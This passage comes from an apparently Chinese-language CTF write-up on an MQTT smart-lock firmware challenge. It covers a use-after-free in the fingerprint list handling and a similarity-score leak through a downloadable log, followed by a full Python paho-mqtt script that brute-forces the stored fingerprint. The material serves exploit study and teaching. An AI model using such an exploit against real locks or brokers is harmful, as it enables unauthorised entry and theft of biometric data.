src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-808\"  sizes=\"(max-width: 881px) 100vw, 881px\" \/><\/div><\/figure>\n\n\n\n<p>\u5176\u6b21\u8bbe\u7f6e\u95e8\u9501\u72b6\u6001\u4e3a\u9501\u95e8\uff0c\u540c\u65f6\u6253\u5f00\u65e5\u5fd7\u6587\u4ef6<\/p>\n\n\n\n<p>\u8fd9\u91cc\u521d\u59cb\u5316\u4e86logger\uff08FILE\u7c7b\u578b\uff09\uff0c\u6700\u7ec8\u8fd9\u4e2a\u6307\u9488\u4f1a\u5b58\u653e\u5728\u5806\u4e0a\uff0c\u800c\u672c\u9898\u7684\u5806\u5730\u5740\u662f\u56fa\u5b9a\u503c<\/p>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-83.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"590\" height=\"60\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-83.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-836\"  sizes=\"(max-width: 590px) 100vw, 590px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u662fqemu\u865a\u62df\u673a\u7684\u7ed3\u679c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-84-1024x287.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"287\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-84-1024x287.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-838\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u61c2\u4e86\u5417\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-85-1024x42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"42\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-85-1024x42.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-839\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u662f\u6211wsl\u7684\u7ed3\u679c\uff0c\u6240\u4ee5\u8fd9\u4e2a\u7cfb\u7edfALSR\u968f\u673a\u5316\u4fdd\u62a4\u5f00\u7684\u6bd4\u8f83\u4f4e\uff0c\u5806\u5730\u5740\u662f\u56fa\u5b9a\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-61-1024x929.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"929\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-61-1024x929.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-810\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u4ece\/etc\/mosquitto\/fingers_credit\u8bfb\u51fa\u4e00\u4e2a\u6307\u7eb9\u6570\u636e\uff08\u5b9e\u5219\u662f\u957f\u5ea6\u4e3a20\u7684int\u6570\u7ec4\uff09\uff0c\u7136\u540e\u518d\u7a0b\u5e8f\u4e2d\u521d\u59cb\u5316\u4e00\u4e0b\u6307\u7eb9\u94fe\u8868<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-60-1024x30.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"30\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-60-1024x30.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-809\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-62.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"615\" height=\"207\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-62.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-811\" style=\"width:840px;height:auto\"  sizes=\"(max-width: 615px) 100vw, 615px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u8ba2\u9605\u4e86\u8fd9\u4e09\u4e2a\u4e3b\u9898<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-63.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"786\" height=\"380\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-63.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-812\"  sizes=\"(max-width: 786px) 100vw, 786px\" \/><\/div><\/figure>\n\n\n\n<p>mqtt_lock\u7684\u6790\u6784\u51fd\u6570<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-64-1024x738.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"738\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-64-1024x738.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-813\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>add\u51fd\u6570\uff0c\u5bf9\u5e94\u7684\u5806\u9898\u4e2d\u7684\u589e\u51fd\u6570\uff0c\u662f\u4e00\u4e2a\u6bd4\u8f83\u7ecf\u5178\u7684\u94fe\u8868\u589e\u6dfb\u5806\u5757\u7c7b\u578b\uff0c\u6709\u4e2a\u5f88\u660e\u663e\u7684uaf\uff0c\u5982\u679cedit\u5931\u8d25\uff0cnew_finger\u8fd9\u4e2a\u6307\u9488\u4f1a\u88abfree\u4f46\u662f\u8fd8\u5728\u6307\u9488\u94fe\u8868\u4e2d<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-65-1024x396.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"396\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-65-1024x396.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-814\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>edit\u51fd\u6570\uff0cformat_finger\u4e3a\u7a7a\u6307\u9488\uff0c\u5c31\u4f1a\u8fd4\u56defalse\uff0c\u800c\u8fd9\u91cc\u6839\u636e\u524d\u9762\u5bf9change_finger_format\u51fd\u6570\u7684\u5206\u6790\uff0c\u53ea\u8981\u6307\u7eb9\u6570\u636e\u91cc\u6709\u5b57\u6bcd\uff0c\u5c31\u4f1aedit\u5931\u8d25<\/p>\n\n\n\n<p>\u7531\u6b64\u53ef\u4ee5\u5229\u7528uaf\u6f0f\u6d1e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-67-1024x877.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"877\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-67-1024x877.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-816\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>remove\u64cd\u4f5c\uff0c\u5bf9\u5e94\u5806\u9898\u4e2d\u7684\u5220\u51fd\u6570\uff0c\u64cd\u4f5c\u6ca1\u6709\u4ec0\u4e48\u6f0f\u6d1e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-68-1024x617.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"617\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-68-1024x617.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-817\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>check_finger\u51fd\u6570\uff0c\u8fd9\u91cc\u4f1a\u8ba1\u7b97\u6307\u7eb9\u7684\u76f8\u4f3c\u5ea6\uff0c\u7136\u540e\u5b58\u653e\u5230\u65e5\u5fd7\u4e2d\uff0c\u540e\u9762\u6709\u53ef\u4ee5\u8bfb\u53d6\u65e5\u5fd7\u7684\u64cd\u4f5c\uff0c\u6240\u4ee5\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\uff0c\u7531\u6b64\u6211\u4eec\u53ef\u4ee5\u731c\u6d4b\u51fa\u8fdc\u7aef\u7684\u6307\u7eb9\u4fe1\u606f\uff0c\u5177\u4f53exp\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import paho.mqtt.client as mqtt\nfrom time import sleep\nimport ssl\nimport re\nimport time\nimport random\n\n# MQTT Broker Configuration\nBROKER = \"127.0.0.1\"\nPORT = 8883\nCAFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/ca.crt\"\nCERTFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/server.crt\"\nKEYFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/server.key\"\nYELLOW = \"\\033&#91;93m\"\nBLUE = \"\\033&#91;94m\"\nEND = \"\\033&#91;0m\"\nauth_token_topic = \"auth_token\"\nvalid_token_topic = \"validtoken123123\"\nlogfile_topic = \"logfile\"\nlogger_topic = \"logger\"\n\nfingerprint_array = &#91;0] * 20  # \u521d\u59cb\u5316\u6570\u7ec4\uff0c\u5305\u542b20\u4e2a0\n\n\ndef extract_similarity_from_eof(log_messages):\n    \"\"\"\u4ece\u65e5\u5fd7\u5217\u8868\u4e2d\u63d0\u53d6 EOF \u4e0a\u4e00\u884c\u7684\u76f8\u4f3c\u5ea6\u767e\u5206\u6bd4\u3002\"\"\"\n    if len(log_messages) &lt; 2:\n        return None\n    eof_index = len(log_messages) - 1\n    second_last_message = log_messages&#91;eof_index - 1]\n    match = re.search(r\"finger similarity:%(&#91;\\d\\.]+)\", second_last_message)\n    return float(match.group(1)) if match else None\n\n\ndef on_message(client, userdata, msg):\n    \"\"\"\u56de\u8c03\u51fd\u6570\uff0c\u7528\u4e8e\u5904\u7406\u63a5\u6536\u5230\u7684\u6d88\u606f\u3002\"\"\"\n    userdata.append(msg.payload.decode())\n\n\ndef perform_bruteforce():\n    results = &#91;]\n\n    # \u8bbe\u7f6e\u8ba2\u9605\u8005\u4ee5\u76d1\u542c\u65e5\u5fd7\n    print(\"&#91;DEBUG] Setting up MQTT client for subscription...\")\n    client = mqtt.Client(userdata=results)\n    client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE, cert_reqs=ssl.CERT_NONE)\n    client.tls_insecure_set(True)\n    client.on_message = on_message\n\n    client.connect(BROKER, PORT, 60)\n    client.subscribe(logfile_topic)\n    client.loop_start()\n\n    # \u9a8c\u8bc1 Token\n    print(\"&#91;DEBUG] Publishing authentication token...\")\n    client.publish(auth_token_topic, \"validtoken123123\")\n    time.sleep(2)\n    fingerprint_array = &#91;0] * 20\n    random_array = &#91;0] * 20\n    for i in range(20):\n        print(f\"&#91;DEBUG] Starting binary search for index {i}...\")\n        left, right = 1, 2 ** 31 - 1  # \u8bbe\u7f6e\u6700\u5927\u503c\u4e3a 2^31 - 1\n        while True:  # \u4fee\u6539\u4e3a\u57fa\u4e8e\u76f8\u4f3c\u5ea6\u7684\u6761\u4ef6\n            random_array&#91;i] = random.randint(left, right)  # \u968f\u673a\u9009\u62e9\u4e00\u4e2a\u503c\n            real_array = fingerprint_array.copy()\n            payload = f\"&#91;{','.join(map(str, random_array))}]\"\n            print(f\"&#91;DEBUG] Publishing guess for index {i}: {payload}\")\n            client.publish(valid_token_topic, payload)\n            time.sleep(0.5)\n\n            # \u8bf7\u6c42\u65e5\u5fd7\n            print(f\"&#91;DEBUG] Requesting log data...\")\n            client.publish(logger_topic, \"download\")\n            time.sleep(0.5)\n\n            # \u7b49\u5f85\u76f8\u4f3c\u5ea6\u54cd\u5e94\n            if len(results) &gt;= 2:  # \u786e\u4fdd\u6709\u8db3\u591f\u7684\u6d88\u606f\u63d0\u53d6 EOF \u4e0a\u4e00\u884c\n                similarity = extract_similarity_from_eof(results)\n                print(f\"&#91;DEBUG] Extracted similarity: {YELLOW}{random_array&#91;i]}{END} : {BLUE}{similarity}{END}\")\n\n                if similarity is None:\n                    print(\"&#91;DEBUG] No similarity data found, retrying...\")\n                    continue\n                P = similarity * 20 \/ 100\n                x1 = int(P * random_array&#91;i])\n                x2 = int(random_array&#91;i] \/\/ P)\n                # \u4e24\u4e2a\u5206\u522b\u53d1\u9001\u4e00\u4e0b\u770b\u770b\u6bd4\u4f8b\n                print(x1, x2)\n                real_array&#91;i] = x1\n                client.publish(valid_token_topic, f\"&#91;{','.join(map(str, real_array))}]\")\n                print(f\"&#91;DEBUG] Publishing guess for index {i}: {real_array}\")\n                client.publish(logger_topic, \"download\")\n                sleep(1)\n                similarity1 = extract_similarity_from_eof(results)\n                print(f\"&#91;DEBUG] Extracted similarity: x1:{YELLOW}{x1}{END} : {BLUE}{similarity1}{END}\")\n                real_array&#91;i] = x2\n                client.publish(valid_token_topic, f\"&#91;{','.join(map(str, real_array))}]\")\n                print(f\"&#91;DEBUG] Publishing guess for index {i}: {real_array}\")\n                client.publish(logger_topic, \"download\")\n                sleep(1)\n                similarity2 = extract_similarity_from_eof(results)\n                print(f\"&#91;DEBUG] Extracted similarity: x2:{YELLOW}{x2}{END} : {BLUE}{similarity2}{END}\")\n                if similarity1 &gt; similarity2:\n                    fingerprint_array&#91;i] = x1\n                    similarity = similarity1\n                else:\n                    fingerprint_array&#91;i] = x2\n                    similarity = similarity2\n                random_array&#91;i] = 0\n\n                if similarity &gt;= 4.75 * (i + 1):\n                    print(f\"&#91;DEBUG] Target similarity reached: {similarity} &gt;= {4.75 * (i + 1)}\")\n                    break  # \u8fbe\u5230\u76ee\u6807\u76f8\u4f3c\u5ea6\u65f6\u7ed3\u675f\u5faa\u73af\n\n\n    client.loop_stop()\n    client.disconnect()\n\n    print(\"Final fingerprint array:\", fingerprint_array)\n    # fingerprint_array\u7684\u9017\u53f7\u4e4b\u95f4\u4e0d\u8981\u6709\u7a7a\u683c\n    print(\"Final fingerprint array:\", ','.join(map(str, fingerprint_array)), end=\"\\n\")\n\nif __name__ == \"__main__\":\n    perform_bruteforce()<\/code><\/pre>\n\n\n\n<p>\u539f\u7406\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6b21\u6211\u5bf9\u7b2c\u4e00\u4f4d\u968f\u673a\u53d1\u9001\u4e00\u4e2a\u6570\uff0c\u5176\u4f59\u5168\u662f0\uff0c\u7a0b\u5e8f\u4f1a\u8ba1\u7b97\u51fa\u76f8\u4f3c\u5ea6\uff0c\u8bb0\u4e3aS\uff0c\u76f8\u4f3c\u6bd4\u4e3aP\uff08min(\u968f\u673a\u6570Random,\u771f\u5b9e\u6307\u7eb9\u6570\u636eReal)\/max(\u968f\u673a\u6570Random,\u771f\u5b9e\u6307\u7eb9\u6570\u636eReal)\uff09\u5219S=(P\/20)*100\uff0c\u7531\u4e8eS\u53ef\u4ee5\u6cc4\u9732\uff0c\u5219P=(S\/100)*20\uff0c\u5219\u4e00\u5b9a\u6709Real\/Random=P\u6216\u8005Random\/Real=P\uff0c\u5373Real=P*Random\u6216Real=Random\/P<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-69.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"395\" height=\"116\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-69.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-818\"  sizes=\"(max-width: 395px) 100vw, 395px\" \/><\/div><\/figure>\n\n\n\n<p>\u5bf9\u5e94\u8fd9\u6bb5\u4ee3\u7801<\/p>\n\n\n\n<p>\u7136\u540e\u6211\u4eec\u628a\u8ba1\u7b97\u51fa\u6765\u7684\u4e24\u4e2a\u53ef\u80fd\u771f\u5b9e\u503c\u90fd\u53d1\u4e00\u904d\uff0c\u770b\u770b\u54ea\u4e2a\u76f8\u4f3c\u5ea6\u66f4\u9ad8\uff0c\u54ea\u4e2a\u5c31\u662f\u771f\u5b9e\u503c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-70-1024x380.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"380\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-70-1024x380.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-819\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u6211\u4eec\u8fd8\u8981\u4fdd\u8bc1\u603b\u76f8\u4f3c\u5ea6\u8fbe\u523090%\uff0c\u4fdd\u9669\u8d77\u89c1\uff0c\u8fd9\u91cc\u8bbe\u7f6e\u7684\u9608\u503c\u662f95%=4.75%*20<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-71-1024x723.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"723\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-71-1024x723.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-820\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u65e5\u5fd7\u5199\u5165\u51fd\u6570\uff0c\u4e0d\u591a\u8bf4\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-72.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"936\" height=\"881\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-72.png\" 